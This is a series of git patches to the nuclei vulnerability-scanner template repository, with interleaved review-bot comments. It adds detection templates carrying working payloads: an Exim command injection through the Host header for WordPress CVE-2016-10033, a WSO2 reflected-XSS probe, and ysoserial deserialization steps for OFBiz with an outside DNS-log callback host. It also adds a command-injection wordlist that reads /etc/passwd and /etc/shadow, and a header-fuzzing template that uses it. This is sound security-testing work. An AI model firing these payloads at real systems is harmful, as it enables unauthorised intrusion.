:robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index 7db1e7ef47..3439e8725b 100644 --- a/README.md +++ b/README.md @@ -38,12 +38,12 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | ---------------- | ------------------------------ | --------------- | ------------------------------- | -------------- | ---------------------------- | | cves | 253 | vulnerabilities | 116 | exposed-panels | 108 | -| takeovers | 65 | exposures | 63 | technologies | 51 | +| takeovers | 65 | exposures | 64 | technologies | 51 | | misconfiguration | 54 | workflows | 24 | miscellaneous | 16 | | default-logins | 20 | exposed-tokens | 9 | dns | 8 | | fuzzing | 6 | helpers | 4 | iot | 7 | -**79 directories, 830 files**. +**79 directories, 831 files**. From f9d98c12129c1ca664b30ffc21d108b6c415642b Mon Sep 17 00:00:00 2001 
From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Wed, 24 Mar 2021 15:47:13 +0530 Subject: [PATCH 29/64] Fixing gitlab-detect --- exposed-panels/{crxde.yaml => crxde-lite.yaml} | 2 +- exposed-panels/gitlab-detect.yaml | 12 +++++++----- 2 files changed, 8 insertions(+), 6 deletions(-) rename exposed-panels/{crxde.yaml => crxde-lite.yaml} (93%) diff --git a/exposed-panels/crxde.yaml b/exposed-panels/crxde-lite.yaml similarity index 93% rename from exposed-panels/crxde.yaml rename to exposed-panels/crxde-lite.yaml index 81e66661bc..36bd50be83 100644 --- a/exposed-panels/crxde.yaml +++ b/exposed-panels/crxde-lite.yaml @@ -1,4 +1,4 @@ -id: crxde +id: crxde-lite info: name: CRXDE Lite diff --git a/exposed-panels/gitlab-detect.yaml b/exposed-panels/gitlab-detect.yaml index 5900c52769..e91e5c1eeb 100644 --- a/exposed-panels/gitlab-detect.yaml +++ b/exposed-panels/gitlab-detect.yaml @@ -9,14 +9,16 @@ requests: - method: GET path: - "{{BaseURL}}/users/sign_in" - - "{{BaseURL}}/users/sign_up" - - "{{BaseURL}}/explore" redirects: true max-redirects: 2 + matchers-condition: and matchers: - type: word words: - - "GitLab" - - "Register for GitLab" - - "Explore GitLab" + - 'GitLab' + - 'https://about.gitlab.com' + + - type: status + status: + - 200 \ No newline at end of file From 362858a6c9175b81e86f7c78ff7de321d97683e5 Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Wed, 24 Mar 2021 17:03:21 +0530 Subject: [PATCH 30/64] Added CVE-2016-10033 --- cves/2016/CVE-2016-10033.yaml | 50 +++++++++++++++++++++++++++++++++++ 1 file changed, 50 insertions(+) create mode 100644 cves/2016/CVE-2016-10033.yaml diff --git a/cves/2016/CVE-2016-10033.yaml b/cves/2016/CVE-2016-10033.yaml new file mode 100644 index 0000000000..cdae3cc13f --- /dev/null +++ b/cves/2016/CVE-2016-10033.yaml 
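Review bot: The rewritten word matcher in gitlab-detect lists `'GitLab'` and `'https://about.gitlab.com'` without a `condition`, and nuclei's word matcher defaults to `or`, so any body that merely mentions "GitLab" (a blog post, documentation, a 404 page naming the product) satisfies it; with `redirects: true` the match may also be evaluated on a redirect target rather than the host under test. Add `condition: and` (and `part: body`) below the words list so the product name and the about.gitlab.com link must both be present — the link is what makes this a sign-in page fingerprint rather than a keyword hit. The `requests:` block this hunk belongs to starts above the hunk.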
@@ -0,0 +1,50 @@ +id: CVE-2016-10033 +info: + name: Wordpress 4.6 Remote Code Execution + author: princechaddha + severity: high + reference: https://exploitbox.io/vuln/WordPress-Exploit-4-6-RCE-CODE-EXEC-CVE-2016-10033.html + tags: wordpress,cve,cve2016,rce + +requests: + - raw: + - |+ + GET /?author=1 HTTP/1.1 + Host: {{Hostname}} + Cache-Control: max-age=0 + Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 + Accept-Language: en-US,en;q=0.9 + Connection: close + + - |+ + POST /wp-login.php?action=lostpassword HTTP/1.1 + Host: target(any -froot@localhost -be ${run{${substr{0}{1}{$spool_directory}}bin${substr{0}{1}{$spool_directory}}touch${substr{10}{1}{$tod_log}}${substr{0}{1}{$spool_directory}}tmp${substr{0}{1}{$spool_directory}}success}} null) + Connection: close + User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0) + Accept: */* + Content-Length: 56 + Content-Type: application/x-www-form-urlencoded + + wp-submit=Get+New+Password&redirect_to=&user_login={{username}} + + unsafe: true + extractors: + - type: regex + name: username + internal: true + group: 1 + part: body + regex: + - 'Author:(?:[A-Za-z0-9 -\_="]+)? Date: Wed, 24 Mar 2021 11:53:22 +0000 Subject: [PATCH 34/64] Auto Update README [Wed Mar 24 11:53:22 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index 772d9d54d5..26f449abad 100644 --- a/README.md +++ b/README.md 
@@ -37,13 +37,13 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | ---------------- | ------------------------------ | --------------- | ------------------------------- | -------------- | ---------------------------- | -| cves | 254 | vulnerabilities | 116 | exposed-panels | 108 | +| cves | 254 | vulnerabilities | 117 | exposed-panels | 108 | | takeovers | 65 | exposures | 64 | technologies | 51 | | misconfiguration | 54 | workflows | 24 | miscellaneous | 16 | | default-logins | 20 | exposed-tokens | 9 | dns | 8 | | fuzzing | 6 | helpers | 4 | iot | 7 | -**79 directories, 832 files**. +**79 directories, 833 files**.
From 1d09746f085440483063b006c8ba1b7a7d496d45 Mon Sep 17 00:00:00 2001
From: SaN ThosH <25719480+Mad-robot@users.noreply.github.com>
Date: Wed, 24 Mar 2021 19:18:42 +0530
Subject: [PATCH 35/64] Update CVE-2021-26295.yaml
---
 cves/2021/CVE-2021-26295.yaml | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/cves/2021/CVE-2021-26295.yaml b/cves/2021/CVE-2021-26295.yaml
index 8cf8fc5e37..a373de8112 100644
--- a/cves/2021/CVE-2021-26295.yaml
+++ b/cves/2021/CVE-2021-26295.yaml
@@ -55,7 +55,7 @@ requests:
 part: header
 - type: word
 words:
- - "null (Illegal hexadecimal character at index 0)"
+ - "null"
 - "errorMessage"
 part: body
 condition: and
From b7adc5e2fd220451be4871cad9562dd335865283 Mon Sep 17 00:00:00 2001
From: SaN ThosH <25719480+Mad-robot@users.noreply.github.com>
Date: Wed, 24 Mar 2021 19:20:57 +0530
Subject: [PATCH 36/64] Update CVE-2021-26295.yaml
---
 cves/2021/CVE-2021-26295.yaml | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/cves/2021/CVE-2021-26295.yaml b/cves/2021/CVE-2021-26295.yaml
index a373de8112..2a97397022 100644
--- a/cves/2021/CVE-2021-26295.yaml
+++ b/cves/2021/CVE-2021-26295.yaml
@@ -55,7 +55,7 @@ requests:
 part: header
 - type: word
 words:
- - "null"
+ - "deserializing"
 - "errorMessage"
 part: body
 condition: and
From 92cda223eba88cfe611187ee603e4d9505353e82 Mon Sep 17 00:00:00 2001
From: SaN ThosH <25719480+Mad-robot@users.noreply.github.com>
Date: Wed, 24 Mar 2021 21:05:32 +0530
Subject: [PATCH 37/64] Create CVE-2020-17453.yaml
---
 cves/2020/CVE-2020-17453.yaml | 29 +++++++++++++++++++++++++++++
 1 file changed, 29 insertions(+)
 create mode 100644 cves/2020/CVE-2020-17453.yaml
diff --git a/cves/2020/CVE-2020-17453.yaml b/cves/2020/CVE-2020-17453.yaml
new file mode 100644
index 0000000000..e6409d3a14
--- /dev/null
+++ b/cves/2020/CVE-2020-17453.yaml
@@ -0,0 +1,29 @@
+id: CVE-2020-17453
+
+info:
+ name: WSO2 Carbon Management Console - XSS
+ author: madrobot
+ severity: medium
+ description: Reflected XSS vulnerability can be exploited by tampering a request parameter in Management Console. This can be performed in both authenticated and unauthenticated requests.
+ tags: xss,wso2,cve2020
+ # https://www.shodan.io/search?query=Server%3A+WSO2+Carbon+Server
+
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}/carbon/admin/login.jsp?msgId=%27%3Balert(%27nuclei%27)%2F%2F'
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "'';alert('nuclei')//';"
+ part: body
+
+ - type: word
+ words:
+ - "text/html"
+ part: header
From 423be58952687bfc08275424aa5a2bee85f6204b Mon Sep 17 00:00:00 2001
From: sandeep <8293321+ehsandeep@users.noreply.github.com>
Date: Wed, 24 Mar 2021 22:42:56 +0530
Subject: [PATCH 38/64] Update CVE-2020-17453.yaml
---
 cves/2020/CVE-2020-17453.yaml | 5 +++--
 1 file changed, 3 insertions(+), 2 deletions(-)
diff --git a/cves/2020/CVE-2020-17453.yaml b/cves/2020/CVE-2020-17453.yaml
index e6409d3a14..17c80dd210 100644
--- a/cves/2020/CVE-2020-17453.yaml
+++ b/cves/2020/CVE-2020-17453.yaml
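Review bot: Loosening the body token from `"null"` to `"deserializing"` (still paired with `"errorMessage"` under `condition: and`) turns the matcher into a generic "this SOAP endpoint tried to deserialize the input and failed" fingerprint; the template is named as Arbitrary Code Execution and described as affecting builds prior to 17.12.06, but nothing in the hunk establishes that a patched build answers differently, so a hit proves less than the name suggests. A comment above the matcher such as `# Matches the generic deserialization fault; confirms the SOAP service path, not exploitability or version` would keep triage honest, and a version-bearing token (if one exists in the response) would be a stronger second word than `errorMessage`. The identical change is applied again in the later PATCH 49 hunk. The enclosing `matchers:` block starts above the hunk.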
@@ -5,13 +5,14 @@ info: author: madrobot severity: medium description: Reflected XSS vulnerability can be exploited by tampering a request parameter in Management Console. This can be performed in both authenticated and unauthenticated requests. - tags: xss,wso2,cve2020 - # https://www.shodan.io/search?query=Server%3A+WSO2+Carbon+Server + tags: xss,wso2,cve2020,cve + reference: https://docs.wso2.com/display/Security/Security+Advisory+WSO2-2020-1132 requests: - method: GET path: - '{{BaseURL}}/carbon/admin/login.jsp?msgId=%27%3Balert(%27nuclei%27)%2F%2F' + matchers-condition: and matchers: - type: status From 8b4c8b8549e76c47655c83935f213cf97ba389a7 Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Wed, 24 Mar 2021 22:46:39 +0530 Subject: [PATCH 39/64] wrong branch :sweat_smile: --- cves/2021/CVE-2021-26295.yaml | 61 ----------------------------------- 1 file changed, 61 deletions(-) delete mode 100644 cves/2021/CVE-2021-26295.yaml diff --git a/cves/2021/CVE-2021-26295.yaml b/cves/2021/CVE-2021-26295.yaml deleted file mode 100644 index 8cf8fc5e37..0000000000 --- a/cves/2021/CVE-2021-26295.yaml +++ /dev/null 
@@ -1,61 +0,0 @@ -id: CVE-2021-26295 -info: - name: Apache OFBiz RMI deserializes Arbitrary Code Execution - author: madrobot - severity: critical - tags: apache,cve,cve2021,rce,ofbiz - description: Apache OFBiz has unsafe deserialization prior to 17.12.06. An unauthenticated attacker can use this vulnerability to successfully take over Apache OFBiz. - reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-26295 - - # Note:- This is detection template, To perform deserializes do as below - # java.exe -jar .\ysoserial-master-d367e379d9-1.jar URLDNS http://t53lq9.dnslog.cn/ > mad.ot - # `cat mad.ot | hex` and replace in along with the url in std-String value - # Exploit: https://github.com/yumusb/CVE-2021-26295-POC - -requests: - - raw: - - | - POST /webtools/control/SOAPService HTTP/1.1 - Host: {{Hostname}} - Accept-Encoding: gzip, deflate - Accept: */* - Accept-Language: en - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36 - Connection: close - Content-Type: application/xml - Content-Length: 910 - - - - - - - - - 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 - - - - - - - - - - - - matchers-condition: and - matchers: - - type: status - status: - - 200 - - type: word - words: - - "OFBiz.Visitor=" - part: header - - type: word - words: - - "null (Illegal hexadecimal character at index 0)" - - "errorMessage" - part: body - condition: and From 1a4743912348e75d56d13682b7b35b7c6986fc29 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Wed, 24 Mar 2021 17:17:30 +0000 Subject: [PATCH 40/64] Auto Update README [Wed Mar 24 17:17:30 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index 26f449abad..050220ac6f 100644 --- a/README.md +++ b/README.md 
@@ -37,13 +37,13 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | ---------------- | ------------------------------ | --------------- | ------------------------------- | -------------- | ---------------------------- | -| cves | 254 | vulnerabilities | 117 | exposed-panels | 108 | +| cves | 255 | vulnerabilities | 117 | exposed-panels | 108 | | takeovers | 65 | exposures | 64 | technologies | 51 | | misconfiguration | 54 | workflows | 24 | miscellaneous | 16 | | default-logins | 20 | exposed-tokens | 9 | dns | 8 | | fuzzing | 6 | helpers | 4 | iot | 7 | -**79 directories, 833 files**. +**79 directories, 834 files**. From 3876cb6b55886df5248d4e64c54d3fa73c6c604b Mon Sep 17 00:00:00 2001 From: SaN ThosH <25719480+Mad-robot@users.noreply.github.com> Date: Tue, 23 Mar 2021 21:30:15 +0530 Subject: [PATCH 41/64] Create CVE-2021-26295.yaml --- cves/2021/CVE-2021-26295.yaml | 59 +++++++++++++++++++++++++++++++++++ 1 file changed, 59 insertions(+) create mode 100644 cves/2021/CVE-2021-26295.yaml diff --git a/cves/2021/CVE-2021-26295.yaml b/cves/2021/CVE-2021-26295.yaml new file mode 100644 index 0000000000..5ab6b8a4ea --- /dev/null +++ b/cves/2021/CVE-2021-26295.yaml 
@@ -0,0 +1,59 @@ +id: CVE-2021-26295 +info: + name:Apache OFBiz RMI deserializes Arbitrary Code Execution + author: madrobot + severity: critical + tags: apache,cve,cve2021,rce + description: Apache OFBiz has unsafe deserialization prior to 17.12.06. An unauthenticated attacker can use this vulnerability to successfully take over Apache OFBiz. + reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-26295 + + # Note:- This is detection template To perform deserializes + # java.exe -jar .\ysoserial-master-d367e379d9-1.jar URLDNS http://t53lq9.dnslog.cn/ > mad.ot + # hex mad.ot and replace in along with the user in std-String value +requests: + - raw: + - | + POST /webtools/control/SOAPService HTTP/1.1 + Host: {{Hostname}} + Accept-Encoding: gzip, deflate + Accept: */* + Accept-Language: en + User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36 + Connection: close + Content-Type: application/xml + Content-Length: 910 + + + + + + + + + + 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 + + + + + + + + + + + + matchers-condition: and + matchers: + - type: status + status: + - 200 + - type: word + words: + - "OFBiz.Visitor=" + part: header + - type: word + words: + - "null (Illegal hexadecimal character at index 0)" + - "errorMessage" + part: body From 38daf751a3e0d7725de5bb32141e99f0e1842637 Mon Sep 17 00:00:00 2001 From: SaN ThosH <25719480+Mad-robot@users.noreply.github.com> Date: Tue, 23 Mar 2021 21:32:09 +0530 Subject: [PATCH 42/64] Update CVE-2021-26295.yaml --- cves/2021/CVE-2021-26295.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cves/2021/CVE-2021-26295.yaml b/cves/2021/CVE-2021-26295.yaml index 5ab6b8a4ea..3b224d5fa5 100644 --- a/cves/2021/CVE-2021-26295.yaml +++ b/cves/2021/CVE-2021-26295.yaml 
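Review bot: The raw request in the new CVE-2021-26295 template hard-codes `Content-Length: 910` while the comments under `info:` tell the operator to regenerate the serialized value and substitute it into the body, which changes the body length; unless nuclei recomputes the header for non-`unsafe` raw requests (I believe it does, but confirm), a substituted request will be truncated or rejected. Either drop the `Content-Length:` line and let the client set it, or extend the comment to `# If you replace the serialized value, update Content-Length to match the new body`. The same comments point at a specific public DNS-log domain, `http://t53lq9.dnslog.cn/`; a shipped template should use a placeholder for the operator's own callback host, since anyone following the comment verbatim reports every scanned host to whoever holds that token.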
@@ -1,6 +1,6 @@ id: CVE-2021-26295 info: - name:Apache OFBiz RMI deserializes Arbitrary Code Execution + name: Apache OFBiz RMI deserializes Arbitrary Code Execution author: madrobot severity: critical tags: apache,cve,cve2021,rce From c55a72a1681153f51dab7cc35f51ec4110a3815b Mon Sep 17 00:00:00 2001 From: SaN ThosH <25719480+Mad-robot@users.noreply.github.com> Date: Tue, 23 Mar 2021 21:42:35 +0530 Subject: [PATCH 43/64] Update CVE-2021-26295.yaml --- cves/2021/CVE-2021-26295.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cves/2021/CVE-2021-26295.yaml b/cves/2021/CVE-2021-26295.yaml index 3b224d5fa5..06d27c2790 100644 --- a/cves/2021/CVE-2021-26295.yaml +++ b/cves/2021/CVE-2021-26295.yaml @@ -7,7 +7,7 @@ info: description: Apache OFBiz has unsafe deserialization prior to 17.12.06. An unauthenticated attacker can use this vulnerability to successfully take over Apache OFBiz. reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-26295 - # Note:- This is detection template To perform deserializes + # Note:- This is detection template, To perform deserializes do as below # java.exe -jar .\ysoserial-master-d367e379d9-1.jar URLDNS http://t53lq9.dnslog.cn/ > mad.ot # hex mad.ot and replace in along with the user in std-String value requests: From 33e3fac8da3b63c5bd55dd969c7a1784e61dac96 Mon Sep 17 00:00:00 2001 From: SaN ThosH <25719480+Mad-robot@users.noreply.github.com> Date: Tue, 23 Mar 2021 21:42:58 +0530 Subject: [PATCH 44/64] Update CVE-2021-26295.yaml --- cves/2021/CVE-2021-26295.yaml | 3 +-- 1 file changed, 1 insertion(+), 2 deletions(-) diff --git a/cves/2021/CVE-2021-26295.yaml b/cves/2021/CVE-2021-26295.yaml index 06d27c2790..1e87d42cec 100644 --- a/cves/2021/CVE-2021-26295.yaml +++ b/cves/2021/CVE-2021-26295.yaml @@ -30,8 +30,7 @@ requests: - - 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 + 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 From 9987dc0c3633d3a24baedc16f3161cc69c4107bf Mon Sep 17 00:00:00 2001 
From: SaN ThosH <25719480+Mad-robot@users.noreply.github.com> Date: Tue, 23 Mar 2021 21:48:13 +0530 Subject: [PATCH 45/64] Update CVE-2021-26295.yaml --- cves/2021/CVE-2021-26295.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cves/2021/CVE-2021-26295.yaml b/cves/2021/CVE-2021-26295.yaml index 1e87d42cec..634b2cfb13 100644 --- a/cves/2021/CVE-2021-26295.yaml +++ b/cves/2021/CVE-2021-26295.yaml @@ -9,7 +9,7 @@ info: # Note:- This is detection template, To perform deserializes do as below # java.exe -jar .\ysoserial-master-d367e379d9-1.jar URLDNS http://t53lq9.dnslog.cn/ > mad.ot - # hex mad.ot and replace in along with the user in std-String value + # `cat mad.ot | hex` and replace in along with the url in std-String value requests: - raw: - | From 635cc7fae79ecc30144b8b9102fe254af56f6b8d Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Wed, 24 Mar 2021 13:00:26 +0530 Subject: [PATCH 46/64] Update CVE-2021-26295.yaml --- cves/2021/CVE-2021-26295.yaml | 4 +++- 1 file changed, 3 insertions(+), 1 deletion(-) diff --git a/cves/2021/CVE-2021-26295.yaml b/cves/2021/CVE-2021-26295.yaml index 634b2cfb13..aed35553ad 100644 --- a/cves/2021/CVE-2021-26295.yaml +++ b/cves/2021/CVE-2021-26295.yaml @@ -3,13 +3,14 @@ info: name: Apache OFBiz RMI deserializes Arbitrary Code Execution author: madrobot severity: critical - tags: apache,cve,cve2021,rce + tags: apache,cve,cve2021,rce,ofbiz description: Apache OFBiz has unsafe deserialization prior to 17.12.06. An unauthenticated attacker can use this vulnerability to successfully take over Apache OFBiz. reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-26295 # Note:- This is detection template, To perform deserializes do as below # java.exe -jar .\ysoserial-master-d367e379d9-1.jar URLDNS http://t53lq9.dnslog.cn/ > mad.ot # `cat mad.ot | hex` and replace in along with the url in std-String value + requests: - raw: - | 
@@ -56,3 +57,4 @@ requests: - "null (Illegal hexadecimal character at index 0)" - "errorMessage" part: body + condition: and From 7a8d56ee651a1b94d66350618b8f6ce63162786d Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Wed, 24 Mar 2021 13:02:29 +0530 Subject: [PATCH 47/64] Update CVE-2021-26295.yaml --- cves/2021/CVE-2021-26295.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/cves/2021/CVE-2021-26295.yaml b/cves/2021/CVE-2021-26295.yaml index aed35553ad..8cf8fc5e37 100644 --- a/cves/2021/CVE-2021-26295.yaml +++ b/cves/2021/CVE-2021-26295.yaml @@ -10,6 +10,7 @@ info: # Note:- This is detection template, To perform deserializes do as below # java.exe -jar .\ysoserial-master-d367e379d9-1.jar URLDNS http://t53lq9.dnslog.cn/ > mad.ot # `cat mad.ot | hex` and replace in along with the url in std-String value + # Exploit: https://github.com/yumusb/CVE-2021-26295-POC requests: - raw: From 8e781f97d0c0b6dc0969f96b48aff6e0ab045f62 Mon Sep 17 00:00:00 2001 From: SaN ThosH <25719480+Mad-robot@users.noreply.github.com> Date: Wed, 24 Mar 2021 19:18:42 +0530 Subject: [PATCH 48/64] Update CVE-2021-26295.yaml --- cves/2021/CVE-2021-26295.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cves/2021/CVE-2021-26295.yaml b/cves/2021/CVE-2021-26295.yaml index 8cf8fc5e37..a373de8112 100644 --- a/cves/2021/CVE-2021-26295.yaml +++ b/cves/2021/CVE-2021-26295.yaml @@ -55,7 +55,7 @@ requests: part: header - type: word words: - - "null (Illegal hexadecimal character at index 0)" + - "null" - "errorMessage" part: body condition: and From bc5ab99237b30262601bb20238d609101b782ace Mon Sep 17 00:00:00 2001 From: SaN ThosH <25719480+Mad-robot@users.noreply.github.com> Date: Wed, 24 Mar 2021 19:20:57 +0530 Subject: [PATCH 49/64] Update CVE-2021-26295.yaml --- cves/2021/CVE-2021-26295.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) 
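Review bot: The added `# Exploit: https://github.com/yumusb/CVE-2021-26295-POC` line extends an `info` comment block that already carries step-by-step exploitation instructions and a third-party DNS-log host, none of which is machine-readable or needed by a template whose own note says it only detects. Move the link under `reference`, which accepts a list (`reference:` / `  - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-26295` / `  - https://github.com/yumusb/CVE-2021-26295-POC`), and reduce the comment to one line stating that the matchers only confirm the deserialization error path and do not verify exploitability. The enclosing `info` block starts outside the hunk.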
diff --git a/cves/2021/CVE-2021-26295.yaml b/cves/2021/CVE-2021-26295.yaml index a373de8112..2a97397022 100644 --- a/cves/2021/CVE-2021-26295.yaml +++ b/cves/2021/CVE-2021-26295.yaml @@ -55,7 +55,7 @@ requests: part: header - type: word words: - - "null" + - "deserializing" - "errorMessage" part: body condition: and From debee9b3e7e2f9524fb94f46983d7caaeedd2e77 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Wed, 24 Mar 2021 17:29:49 +0000 Subject: [PATCH 50/64] Auto Update README [Wed Mar 24 17:29:49 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index 050220ac6f..59f45d7176 100644 --- a/README.md +++ b/README.md @@ -37,13 +37,13 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | ---------------- | ------------------------------ | --------------- | ------------------------------- | -------------- | ---------------------------- | -| cves | 255 | vulnerabilities | 117 | exposed-panels | 108 | +| cves | 256 | vulnerabilities | 117 | exposed-panels | 108 | | takeovers | 65 | exposures | 64 | technologies | 51 | | misconfiguration | 54 | workflows | 24 | miscellaneous | 16 | | default-logins | 20 | exposed-tokens | 9 | dns | 8 | | fuzzing | 6 | helpers | 4 | iot | 7 | -**79 directories, 834 files**. +**79 directories, 835 files**. From 68cc8b67cd55e5aa62c4fa2870b1834b3743aecb Mon Sep 17 00:00:00 2001 From: Geeknik Labs <466878+geeknik@users.noreply.github.com> Date: Wed, 24 Mar 2021 17:40:08 +0000 Subject: [PATCH 51/64] Create command-injection.txt --- helpers/wordlists/command-injection.txt | 75 +++++++++++++++++++++++++ 1 file changed, 75 insertions(+) create mode 100644 helpers/wordlists/command-injection.txt diff --git a/helpers/wordlists/command-injection.txt b/helpers/wordlists/command-injection.txt new file mode 100644 index 0000000000..9fe9ecd72c --- /dev/null 
+++ b/helpers/wordlists/command-injection.txt @@ -0,0 +1,75 @@ +<!--#exec%20cmd="/bin/cat%20/etc/passwd"--> +<!--#exec%20cmd="/bin/cat%20/etc/shadow"--> +<!--#exec%20cmd="/usr/bin/id;--> +<!--#exec%20cmd="/usr/bin/id;--> +/index.html|id| +;id; +;id +;netstat -a; +;system('cat%20/etc/passwd') +;id; +|id +|/usr/bin/id +|id| +|/usr/bin/id| +||/usr/bin/id| +|id; +||/usr/bin/id; +;id| +;|/usr/bin/id| +\n/bin/ls -al\n +\n/usr/bin/id\n +\nid\n +\n/usr/bin/id; +\nid; +\n/usr/bin/id| +\nid| +;/usr/bin/id\n +;id\n +|usr/bin/id\n +|nid\n +`id` +`/usr/bin/id` +a);id +a;id +a);id; +a;id; +a);id| +a;id| +a)|id +a|id +a)|id; +a|id +|/bin/ls -al +a);/usr/bin/id +a;/usr/bin/id +a);/usr/bin/id; +a;/usr/bin/id; +a);/usr/bin/id| +a;/usr/bin/id| +a)|/usr/bin/id +a|/usr/bin/id +a)|/usr/bin/id; +a|/usr/bin/id +;system('cat%20/etc/passwd') +;system('id') +;system('/usr/bin/id') +%0Acat%20/etc/passwd +%0A/usr/bin/id +%0Aid +%0A/usr/bin/id%0A +%0Aid%0A +| id +& id +; id +%0a id %0a +`id` +$;/usr/bin/id +$(`cat /etc/passwd`) +cat /etc/passwd +%0Acat%20/etc/passwd +{{ get_user_file("/etc/passwd") }} + + +system('cat /etc/passwd'); + From bef49214f4b0db156acc376ba94862c08e599f04 Mon Sep 17 00:00:00 2001 From: Geeknik Labs <466878+geeknik@users.noreply.github.com> Date: Wed, 24 Mar 2021 17:44:46 +0000 Subject: [PATCH 52/64] Create request-headers.txt --- helpers/wordlists/request-headers.txt | 33 +++++++++++++++++++++++++++ 1 file changed, 33 insertions(+) create mode 100644 helpers/wordlists/request-headers.txt diff --git a/helpers/wordlists/request-headers.txt b/helpers/wordlists/request-headers.txt new file mode 100644 index 0000000000..8cbd62b12b --- /dev/null +++ b/helpers/wordlists/request-headers.txt 
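Review bot: The list carries duplicate entries — `<!--#exec%20cmd="/usr/bin/id;-->`, `;id;`, `;system('cat%20/etc/passwd')`, `` `id` ``, `%0Acat%20/etc/passwd`, `a|id` and `a|/usr/bin/id` each appear twice — and every duplicate costs one extra request per header name when the file is driven by a clusterbomb attack, so they should be removed. The two blank lines before `system('cat /etc/passwd');` and the trailing blank line will presumably be loaded as empty payloads unless the payload loader skips blank lines; drop them. `|nid\n` looks like a typo that cannot produce a hit and should be dropped as well.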
@@ -0,0 +1,33 @@
+Accept
+Accept-Charset
+Accept-Datetime
+Accept-Encoding
+Accept-Language
+Authorization
+Cache-Control
+Connection
+Content-Length
+Content-MD5
+Content-Type
+Cookie
+Date
+Expect
+Forwarded
+From
+Host
+If-Match
+If-Modified-Since
+If-None-Match
+If-Range
+If-Unmodified-Since
+Max-Forwards
+Origin
+Pragma
+Proxy-Authorization
+Range
+Referer
+TE
+Upgrade
+User-Agent
+Via
+Warning
From 87b5ebc7f1901a7241e667bfafd4ac7baa4219f3 Mon Sep 17 00:00:00 2001
From: Geeknik Labs <466878+geeknik@users.noreply.github.com>
Date: Wed, 24 Mar 2021 17:46:18 +0000
Subject: [PATCH 53/64] Create header-command-injection.yaml
---
 .../generic/header-command-injection.yaml | 37 +++++++++++++++++++
 1 file changed, 37 insertions(+)
 create mode 100644 vulnerabilities/generic/header-command-injection.yaml
diff --git a/vulnerabilities/generic/header-command-injection.yaml b/vulnerabilities/generic/header-command-injection.yaml
new file mode 100644
index 0000000000..601b46d460
--- /dev/null
+++ b/vulnerabilities/generic/header-command-injection.yaml
@@ -0,0 +1,37 @@
+id: header-command-injection
+
+info:
+ name: Header Command Injection
+ author: geeknik
+ severity: high
+ description: Fuzzings headers for command injection
+
+requests:
+ - payloads:
+ header: nuclei-templates/helpers/payloads/request-headers.txt
+ payload: nuclei-templates/helpers/payloads/command-injection.txt
+
+ raw:
+ - |
+ GET /?§header§ HTTP/1.1
+ Host: {{Hostname}}
+ User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
+ §header§: §payload§
+ Connection: close
+
+ attack: clusterbomb
+
+ redirects: true
+
+ matchers-condition: or
+ matchers:
+ - type: word
+ words:
+ - "uid="
+ - "gid="
+ - "groups="
+ condition: and
+
+ - type: regex
+ regex:
+ - "root:[x*]:0:0:"
From da6a52a0530a63eadb34ee039224137cdd0ee72a Mon Sep 17 00:00:00 2001
